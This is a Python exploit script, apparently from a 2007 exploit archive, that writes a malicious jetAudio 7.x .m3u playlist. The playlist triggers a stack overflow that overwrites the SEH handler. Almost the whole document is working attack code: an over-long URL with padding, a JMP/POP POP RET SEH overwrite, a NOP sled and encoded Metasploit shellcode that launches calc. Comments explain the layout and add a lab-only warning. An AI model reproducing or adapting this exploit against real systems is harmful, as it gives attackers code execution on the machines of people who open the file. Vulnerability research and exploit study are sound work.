
# Title : jetAudio 7.x (m3u File) Local SEH Overwrite Exploit
# Published : 2007-10-14
# Author : h07


#!/usr/bin/python
# jetAudio 7.x (m3u File) 0day Local SEH Overwrite Exploit
# Bug discovered by Krystian Kloskowski (h07) <h07@interia.pl>
# Tested on: jetAudio 7.0.3 Basic / 2k SP4 Polish
# Shellcode: Windows Execute Command (calc) <metasploit.com>
# Just for fun  ;) 
##

from struct import pack

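# Playlist header followed by a single "http://<buf>" entry. The over-long
# URL is what overruns jetAudio's stack buffer and lands on the SEH chain.
# The listing had lost every "\" in its escape sequences ("x6a" instead of
# "\x6a", "#EXTM3Unhttp" instead of "#EXTM3U\nhttp"); they are restored here,
# and all payload pieces are bytes so the script also runs on Python 3.
M3U_TEMPLATE = b"#EXTM3U\nhttp://%s"

# Metasploit "Windows Execute Command" (calc) payload, encoded; 158 bytes.
# Contains no 0x0A byte, so it survives either text or binary file mode, but
# the file is written in binary mode anyway (see main()).
shellcode = (
    b"\x6a\x22\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x8d\x6c\xf6"
    b"\xb2\x83\xeb\xfc\xe2\xf4\x71\x84\xb2\xb2\x8d\x6c\x7d\xf7\xb1\xe7"
    b"\x8a\xb7\xf5\x6d\x19\x39\xc2\x74\x7d\xed\xad\x6d\x1d\xfb\x06\x58"
    b"\x7d\xb3\x63\x5d\x36\x2b\x21\xe8\x36\xc6\x8a\xad\x3c\xbf\x8c\xae"
    b"\x1d\x46\xb6\x38\xd2\xb6\xf8\x89\x7d\xed\xa9\x6d\x1d\xd4\x06\x60"
    b"\xbd\x39\xd2\x70\xf7\x59\x06\x70\x7d\xb3\x66\xe5\xaa\x96\x89\xaf"
    b"\xc7\x72\xe9\xe7\xb6\x82\x08\xac\x8e\xbe\x06\x2c\xfa\x39\xfd\x70"
    b"\x5b\x39\xe5\x64\x1d\xbb\x06\xec\x46\xb2\x8d\x6c\x7d\xda\xb1\x33"
    b"\xc7\x44\xed\x3a\x7f\x4a\x0e\xac\x8d\xe2\xe5\x9c\x7c\xb6\xd2\x04"
    b"\x6e\x4c\x07\x62\xa1\x4d\x6a\x0f\x97\xde\xee\x6c\xf6\xb2"
)

# Overwritten "next SEH record" pointer. Packed little-endian it becomes
# EB 06 90 90 = JMP SHORT +0x06 ; NOP ; NOP, i.e. it executes in place and
# hops over the 4-byte handler address into the NOP sled.
NEXT_SEH_RECORD = 0x909006EB
# Overwritten SE handler: a POP POP RET gadget in SHELL32.DLL of Windows 2000
# SP4 (Polish build). Windows 2000 has no ASLR, so the address is stable for
# that exact build, but it is ONLY valid there; any other OS / service pack /
# language needs a freshly located gadget or the process just crashes.
SE_HANDLER = 0x7CEA61F7

# "CLICK ME" (8 bytes) + PADDING puts the SEH record at URL offset 1017.
PADDING = 1009
NOP_SLED = 128


def build_m3u():
    """Return the complete malicious .m3u contents as bytes.

    Layout of the URL that follows "http://" in the playlist entry:
        "CLICK ME" | 1009 spaces | nSEH (JMP +6) | SEH (POP POP RET)
        | 128 NOPs | shellcode
    The function is pure (no I/O) so the layout can be checked in tests.
    """
    url = b"".join([
        b"CLICK ME",
        b"\x20" * PADDING,
        pack("<L", NEXT_SEH_RECORD),
        pack("<L", SE_HANDLER),
        b"\x90" * NOP_SLED,
        shellcode,
    ])
    # bytes %-formatting: Python 2 and Python 3.5+.
    return M3U_TEMPLATE % url


def main(out_path="evil.m3u"):
    """Write the payload to *out_path* and print DONE.

    The file is opened in binary mode so no byte of the payload is subject to
    newline translation. SECURITY: the resulting playlist executes attacker
    code when opened in a vulnerable jetAudio 7.x; generate and open it only
    on isolated lab systems you are authorized to test.
    """
    with open(out_path, "wb") as fd:
        fd.write(build_m3u())
    print("DONE")


if __name__ == "__main__":
    main()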

# EoF
